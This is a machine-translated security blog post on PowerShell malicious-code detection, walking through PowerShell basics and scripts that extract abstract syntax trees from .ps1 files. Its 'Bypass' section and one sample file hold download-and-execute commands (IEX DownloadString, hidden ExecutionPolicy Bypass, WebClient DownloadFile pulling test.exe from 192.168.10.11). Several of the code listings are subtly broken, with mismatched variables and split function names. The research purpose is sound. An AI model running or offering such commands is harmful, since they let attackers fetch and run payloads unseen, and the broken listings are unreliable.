[System Security] Forty-three. Powershell malicious code detection series (5) automatic extraction of abstract syntax tree detailed explanation

Hits: 0

In a simple commemoration, the CSDN reading volume is about to exceed 10 million, and the entire network has nearly 300,000 fans. Ten years, nearly 700 articles, one can really say: This is my youth when I was 20 to 30 years old. There are both technical blogs and stories of Nazhangluo’s family. Our love history has also witnessed a childhood sufferer. The students influenced by the mountains in Guizhou have grown up slowly, and I have met many bloggers. Mr. Su, as shown in Figure 7, suffered many setbacks, graduated with a Ph.D., and returned to his hometown Yulin to become a university teacher. Today, he built a chemistry laboratory at his own expense, just wanting to pass on what he has learned to his students. In the past ten years, I have met many such bloggers, teachers and bosses on CSDN. We have never met each other. We are all over the world, but we encourage each other.

Finally, thanks to CSDN, I have cheated a lot of gifts over the years, and I am also grateful to every reader who has read Nazhang’s story and who has liked my technology blog. I also hope that everyone will remember a sharer named Eastmount. Yes, he is not an expert, nor a big guy, but a technology sharer who writes blogs silently. He writes because of love (this year is too busy to write very little). I will also write on CSDN for 20, 30, and a lifetime, and will also record the story of our family. I really want to continue to write our stories, but I am too busy, so let’s write more after graduation.

I really want to graduate as soon as possible and return to my hometown of Guizhou to continue to be a teacher. I feel that there are so many blogs to share, so many courses to take, so many open source codes, and so much knowledge to learn. I look forward to the day when I stand in front of the podium again. Feel free to participate in any activity, I and CSDN “life does not end, writing does not go out” story to see the following article! Too busy, too busy, just a few words here, and in the next decade, we will review the story of these 20 years in detail. Continue to sink your heart to study, be diligent in spite of cooking, be grateful to meet you, continue to work hard, late Anna!

You may have seen a similar article written by me before, so why repeat it? I just want to better help beginners understand virus reverse analysis and system security, and be more systematic without destroying the previous series. Therefore, I re-opened this column to prepare for system sorting and in-depth study of system security, reverse analysis and malicious code detection. The series of articles on “System Security” will be more focused, more systematic, and more in-depth, which is also the author’s slow growth history. It is indeed difficult to change majors, and reverse analysis is also a hard bone, but I will also try it to see how much I can learn in the next four years. Enjoy the process, come on together~

The previous article briefly introduced PowerShell, Powershell malicious code detection summary and abstract syntax tree (AST) extraction, mainly from the perspective of the paper. This article will introduce the abstract syntax tree extraction method in detail, which is implemented through the officially provided interface, including abstract syntax tree visualization and node extraction. I hope this article is helpful to you, and I recommend everyone to read the paper, read it and cherish it.

Article directory

I hope that these basic principles can better help everyone to do a good job in defense and protection, basic articles, I hope to be helpful to you. As a novice in network security, the author shares some basic self-study tutorials, mainly online notes, I hope you like it. At the same time, I hope you can work with me and make progress. In the future, I will learn about network security and system security knowledge and share relevant experiments. In short, I hope that this series of articles will be helpful to bloggers. Writing articles is not easy. If you don’t like it, don’t spray it. Thank you! If the article is helpful to you, it will be the biggest motivation for my creation. You can like, comment, and privately chat. Come on!

Author’s github resources:

Since July 2019, I have come to an unfamiliar major – cyberspace security. It is very painful and uncomfortable to enter the security field for the first time. There are too many things to learn and it involves too many aspects, but fortunately, by sharing 100 articles in the “Self-learning of Network Security” series, I am struggling to move forward. I am grateful to the security bosses and friends who have met, known and enjoyed each other this year. If the writing is not good or insufficient, please also ask everyone to be honest!
Next, I will start a new security series called “System Security”, which is also a free 100 articles. The author will go deeper into malicious sample analysis, [reverse analysis] , intranet penetration, network attack and defense combat, etc. Share and learn from bloggers in the form of notes and practical operations, I hope to make progress with you, come on~

Previous analysis:

Statement: I firmly oppose the use of teaching methods to commit crimes. All crimes will be severely punished. Green networks need our joint maintenance, and I recommend everyone to understand the principles behind them and better protect them.

1. Overview of [Powershell]

1. High threat

In recent years, Powershell has been widely used in APT attacks due to its strong ease of use and high concealment. Traditional malicious code detection techniques based on artificial feature extraction and machine learning methods are becoming more and more difficult to be effective in Powershell malicious code detection.

Microsoft’s PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. It is based on Microsoft’s .NET Framework and includes an interface that allows programmers to access operating system services. While administrators can configure PowerShell to restrict access and reduce vulnerabilities, these restrictions can be bypassed. Additionally, PowerShell commands can easily be dynamically generated, executed from memory, encoded, and obfuscated, making logging and forensic analysis of PowerShell-executed code challenging.

For these reasons, PowerShell is increasingly used by cybercriminals as part of their attack toolchain, primarily for downloading malicious content and lateral movement . In fact, a recent comprehensive technical report by Symantec on PowerShell abuse by cybercriminals reported a dramatic increase in the number of malicious PowerShell samples they received and the number of penetration tools and frameworks using PowerShell. This highlights the urgent need to develop effective methods for detecting malicious PowerShell commands.

2. Basic grammar

In addition, in penetration testing, Powershell is a link that cannot be ignored, and it is still constantly updated and developed. It has good flexibility and the ability to manage Windows systems functionally. Once an attacker can run the code on a computer, the PowerShell script file (.ps1) is downloaded to disk for execution, and it can run directly in memory without even writing to disk.

These features make PowerShell the attacker’s preferred attack method when gaining and maintaining access rights to the system. Using many features of PowerShell, attackers can continue to attack without being easily discovered. Commonly used PowerShell attack tools are as follows.

  • PowerSploit
    This is a widely used PowerShell post-exploitation framework among many PowerShell attack tools, and is often used for information detection, privilege escalation, credential theft, persistence and other operations.
  • Nishang
    A PowerShell-based penetration testing tool that integrates frameworks, scripts and various payloads, including scripts such as download and execution, keylogging, DNS, and delayed commands.
  • Empire
    PowerShell-based remote control Trojan can export and track credential information from the credential database. It is often used to provide integrated modules for early exploits, information detection, credential theft, and persistent control.
  • PowerCat
    The PowerShell version of NetCat, known as the “Swiss Army Knife” of networking tools, can read and write data over the network via TCP and UDP. By combining and redirecting with other tools, readers can use it in a variety of ways in scripts.

Under PowerShell, similar “cmd commands” are called “cmdlets”, and their naming conventions are quite consistent. They all take the form of “verb-noun”, such as New-Item, and the verb part is generally Add, New, Get, Remove, Set, etc. , the named alias is generally compatible with Windows Command and Linux Shell. For example, the Get-ChildItem command can use dir or ls, and PowerShell commands are not case-sensitive.

The following uses file operations as an example to explain the basic usage of PowerShell commands.

  • New directory : New-Item whitecellclub-ItemType Directory
  • New file : New-Item light.txt-ItemType File
  • Remove directory : Remove-Item whitecellclub
  • Display file content : Get-Content test.txt
  • Set file content : Set-Content test.txt-Value “hello, world!”
  • Additional content : Add-Content light.txt-Value “i love you”
  • Clear content : Clear-Content test.txt

Take a simple example:

New-Item test -ItemType directory
Remove-Item test

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

3.Bypass

After testing, the PowerShell script downloaded during the execution of the cmd window can be run directly regardless of the current strategy. If you want to run the script program in the PowerShell window, you must change the Restricted policy to Unrestricted with administrator privileges, so during penetration, you need to adopt some methods to bypass the policy to execute the script.

(1) Download remote PowerShell script to bypass permission execution
Call the DownloadString function to download the remote ps1 script file.

//The cmd window executes the following command 
powershell -c IEX (New- Object System.Net.Webclient).DownloadString( 'http://192.168.10.11/test.ps1' )

//Execute IEX in the powershell window 
(New- Object System.Net.Webclient).DownloadString( 'http://192.168.10.11/test.ps1' )

The picture below refers to the picture of Mr. Xie, switch to the CMD window to run.

(2) Execution by bypassing local permissions
Upload xxx.ps1 to the target server, and in the CMD environment, execute the script locally on the target server, as shown below.

PowerShell.exe -ExcutionPolicy Bypass -File xxx.ps1

powershell -exec bypass  .\test.ps1

(3) Locally hide and bypass permissions to execute scripts

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File xxx.ps1

For example:

  • powershell.exe -exec bypass -W hidden -nop test.ps1

(4) Use IEX to download remote PS1 scripts to bypass permission execution

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden-NoProfile
-NonIIEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

Function definition:

function Test-MrParameter {

    param (
        [string]$ComputerName
    )

    Write-Output $ComputerName
    Write-Output ($ComputerName+$ComputerName)
    Write-Output ($ComputerName+$ComputerName+$ComputerName)
}

View and use functions:

Get-Command -Name Test-MrParameter -Syntax
Test-MrParameter -ComputerName 'this is a computer name'
pause

Output result:

Test-MrParameter [[-ComputerName] <Object>]

this is a computer name
Press Enter to continue...:

2. powershell.one

The abstract [syntax tree] of PowerShell is used as the semantic expression of the code. It represents the logical structure of the script function in the form of a multi-fork tree. It retains the characteristics of the code context and eliminates the interference of irrelevant parameters. It is an effective method for analyzing PowerShell code with similar functions. A common approach is to use an interface or write a custom program implementation. The first method was introduced in the previous article, and this article will introduce the officially provided interface.

Windows provides an interface for accessing script AST for PowerShell, and the AST structure obtained by using the built-in interface is shown in the figure.

The Abstract Syntax Tree (AST) groups tokens into meaningful structures and is the most sophisticated way of analyzing PowerShell code.

1. Concept

The PowerShell parser converts single characters into meaningful keywords and differentiates, for example, commands, parameters, and variables, which is called tokenization, and was described earlier. For example, editors use these markers to color code and display variables in a different color than commands.

The parser doesn’t stop there. In order for PowerShell to execute code, it needs to know how the individual tokens form an executable structure. The parser takes the tokens and builds an abstract syntax tree (AST), which basically groups the tokens into meaningful structures.

An abstract syntax tree is called a tree because it works like a hierarchical tree. PowerShell starts with the first token and then takes the PowerShell language definition (syntax) to see what the next possible token might be. This way, the parser works through the code.

  • Case 1: PowerShell succeeds and creates a valid structure for the code
  • Case 2: Encountered and raised a syntax error

2. Access AST

Starting with PowerShell 3, the Abstract Syntax Tree is exposed to you, so you can now also analyze PowerShell code and understand its internals. There are two main ways to access the AST:

  • ScriptBlock (code block): A scriptblock is a valid PowerShell code block, so it has already been processed by the parser, and the parser guarantees that there are no syntax errors in the code. Each scriptblock has a property called AST that exposes the abstract syntax tree of the code contained in the scriptblock.
  • Parser: You can ask the PowerShell parser to parse arbitrary code and return a token and AST. When you enter and execute code, you’re basically mimicking what PowerShell does. Because the parser deals with raw text, there is no guarantee that the code is syntactically correct. That’s why the parser also returns any syntax errors it finds.

A simple example of viewing the AST is shown in the figure below, where you can view the Abstract Syntax Tree (AST) built by the parser.

$code.Invoke()
$code = { "Hello" * 10 }
$code.Ast

The output is shown in the following figure:

This can be used to create a simple test function to identify PowerShell code

function Test-PowerShellCode
{
    param
    (
        [string]
        $Code
    )

    try
    {
        # try and convert string to scriptblock:
        $null = [ScriptBlock]::Create($Code)
    }
    catch
    {
        # the parser is invoked implicitly and returns
        # syntax errors as exceptions:
        $_.Exception.InnerException.Errors
    }
}

An Abstract Syntax Tree (AST) is a tree of Ast objects. The top of this tree is what the parser returns to you. Any Ast object encountered while traversing the abstract syntax tree has Parent and Extent properties. Parent defines the tree relationship and Extent defines the PowerShell code covered by the Ast object.

Common methods are as follows:

Name                   Signature
----                   ---------
Copy                   System.Management.Automation.Language.Ast Copy()
Find                   System.Management.Automation.Language.Ast Find(System.Func[System.Management.Automation.Language.Ast,bool] predicate, bool searchNestedScriptBlocks)
FindAll                System.Collections.Generic.IEnumerable[System.Management.Automation.Language.Ast] FindAll(System.Func[System.Management.Automation.Language.Ast,bool] predicate, b...
Visit                  System.Object Visit(System.Management.Automation.Language.ICustomAstVisitor astVisitor), void Visit(System.Management.Automation.Language.AstVisitor astVisitor)

3. Abstract Syntax Tree [Visualization]

1. Official example

It may be helpful to add the Ast object relationships to the output, and visualize the tree, and how the objects are nested. That’s why I created Convert-CodeToAst that takes any simple (or complex) PowerShell code (scriptblock) and outputs the object hierarchy and involved types:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]
    [ScriptBlock]
    $Code
  )


  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent

  }

  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # take id of current ast object
      $change = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Call it like this:

Convert-CodeToAst -Code {
  # place your test code here (make it as simple as you can):
  $a = 1
}

operation result:

[NamedBlockAst]: $a = 1
--[AssignmentStatementAst]: $a = 1
----[VariableExpressionAst]: $a
----[CommandExpressionAst]: 1
------[ConstantExpressionAst]: 1

Function code analysis:

If prompted to prohibit running scripts, as shown in the following figure:

Simple setup is required.

  • set-ExecutionPolicy RemoteSigned
    Prohibit running scripts on the system

At the same time, it is recommended that you edit Powershell code in VS Code.

2. AST extraction of code blocks

The code for abstract syntax tree extraction is given below. The code is relatively simple, and you can learn it directly.

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter
    [ScriptBlock]
    $Code
  )

  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent

  }

  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # take id of current ast object
      $change = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Convert-CodeToAst -Code {$a=1}

The running result is shown in the following figure:

3. Specify the AST extraction of the PS file

Directly give the extraction code of the specified PS script file.

The complete code and detailed comments are as follows:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Extract the contents of the ps file 
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # Create Scipt block
  $code = [ScriptBlock]::Create($content)

  # extract AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # recursively visualize the tree 
  function  Visualize - Tree ($Id, $Indent = 0 )
   {
     # each level of indent 
    $space = '--' * $indent
    $hierarchy[$id] | ForEach -Object {
       # Output AST object 
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # Get the id of the current AST object
      $change = $_.GetHashCode()
      # Recursively its children (if any) 
      if ($hierarchy.ContainsKey($newid)) {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # Start the visualization using the AST root object
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result
}

Convert-CodeToAst -str .\data\example-001.ps1

At this point the output is as shown below:

Assume the “example-002.ps2” file exists.

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');

The corresponding AST is as follows:

PS D:\powershell> .\get_ast_002.ps1
file name: .\data\example-002.ps1
powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
[NamedBlockAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--[PipelineAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
----[CommandAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
------[StringConstantExpressionAst]: powershell
------[InvokeMemberExpressionAst]: (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--------[ParenExpressionAst]: (new-object system.net.webclient)
----------[PipelineAst]: new-object system.net.webclient
------------[CommandAst]: new-object system.net.webclient
--------------[StringConstantExpressionAst]: new-object
--------------[StringConstantExpressionAst]: system.net.webclient
--------[StringConstantExpressionAst]: downloadfile
--------[StringConstantExpressionAst]: 'http://192.168.10.11/test.exe'
--------[StringConstantExpressionAst]: 'test.exe'

So, if I just want to extract nodes, how to achieve it?

4. Abstract Syntax Tree Node Extraction

1. Extract AST nodes

Use post-order traversal to extract AST nodes. The specific code is as follows:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Extract the contents of the ps file 
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # Create Scipt block
  $code = [ScriptBlock]::Create($str)

  # extract AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # Recursive visualization tree 
  function  Visualize - Tree ($Id)
   {
     # Each level of indentation 
    $hierarchy[$id] | ForEach -Object {
       # Get the id of the current AST object
      $change = $_.GetHashCode()

      # Recursively its children (if any) 
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # Start visualization with AST root object 
  Visualize-Tree -id 0 
  return $result
}

Convert-CodeToAst -str .\data\example-002.ps1

The output of the “$a=1” example is shown below:

The output of the post-sequence node of another Powershell code is shown in the following figure:

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
StringConstantExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
CommandAst
PipelineAst
ParenExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
InvokeMemberExpressionAst
CommandAst
PipelineAst
NamedBlockAst

2. AST node splicing

Finally, add the add_blanks function to splicing the content of each node and store it in a local CSV or TXT file. The complete code looks like this:

# Function: concatenate AST node content 
  function  add_blanks  {
      param (
        [parameter(Mandatory=$true)]
        [System.Array]$arr
      )
      $strNode = '' 
      foreach ($elem in $arr) {
           if ($strNode.Length -ne 0 ) { #not equal to 
              $elem = " " + $elem
          }
          $strNode = $strNode + $elem
      }
      return $strNode
  }

# Function: Extract Abstract Syntax Tree (AST) of Powershell code 
function  Convert - CodeToAst
 {
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Extract the contents of the ps file 
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # Create Scipt block
  $code = [ScriptBlock]::Create($content)

  # extract AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # Recursive visualization tree 
  function  Visualize - Tree ($Id)
   {
     # Each level of indentation 
    $hierarchy[$id] | ForEach -Object {
       # Get the id of the current AST object
      $change = $_.GetHashCode()

      # Recursively its children (if any) 
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # Start the visualization using the AST root object
  Visualize-Tree -id $code.Ast.GetHashCode()

  # result stores the content of the root node
  $strNode = add_blanks -arr $result
  Write-Output ($strNode,"{{EJS0}}")

  # result stores the content of the root node
  $strNode = add_blanks -arr $result
  return $strNode
}

# Read a separate PS file 
# Convert-CodeToAst -str .\data\example-002.ps1

# Note that input is a system variable 
$inputCSV = '.\data\data.csv' 
$outputCSV = '.\data\data_AST.csv' 
Read_csv_powershell -inputfile $inputCSV -outputfile $outputCSV

The results of the operation are shown in the figure below, including saving to the “data_ast.csv” file.

5. ParseInput replaces Create

When the above code is used to parse the PS file, an error is usually reported. Checked a lot of information but no solution.

  • Unexpected token in expression or statement
  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException

The final solution found: Create will parse the Powershell code to ensure that there is no syntax error before creating the code block. Here is another method of substitution, namely:

  • https://stackoverflow.com/questions/39909021/parsing-powershell-script-with-ast

$code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)

The complete code is as follows:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Extract the contents of the ps file 
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # Create Scipt code block 
  # Error: Expression or statement contains unexpected token 
  # Reason: Create needs to ensure that the PS code is correct 
  # $code = [ScriptBlock]::Create($content)

  $tokens = $null
  $errors = $null
  $code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)


  Write-Output $code

  # extract AST
  $code.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # Recursive visualization tree 
  function  Visualize - Tree ($Id)
   {
     # Each level of indentation 
    $hierarchy[$id] | ForEach -Object {
       # Get the id of the current AST object
      $change = $_.GetHashCode()

      # Recursively its children (if any) 
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # Start the visualization using the AST root object
  Visualize-Tree -id $code.GetHashCode()
  Write-Output $result
  return $result
}

Convert-CodeToAst -str .\data\beacon

6. Summary

This article is written here to introduce the introduction, I hope to help you.

  • 1. Overview of Powershell
    1. High threat
    2. Basic syntax
    3. Bypass
  • 2. powershell.one
    1. Concept
    2. Access to AST
  • 3. Visualization of abstract syntax tree
    1. Official example
    2. AST extraction of code block
    3. AST extraction of specified PS file
  • 4. Abstract syntax tree node extraction
    1. Extract AST node 2. AST
      node splicing
    2. Loop read PS and extract AST
  • V. Summary

For the readers who can see here, I would like to express my sincere thanks. The author gives another benefit and recommends three Powershell treasure websites.

If there are some deficiencies in this article, please also ask Haihan. The author’s slow growth path as a network security beginner! Hope to write more articles about it in the future. At the same time, I am very grateful to the security bosses in the reference for sharing their articles. I know that I am very good and I have to work hard to move forward.

Welcome everyone to discuss, do you think this series of articles helps you! Any suggestions can be commented to inform readers, and encourage each other.

Leave a Reply

Your email address will not be published.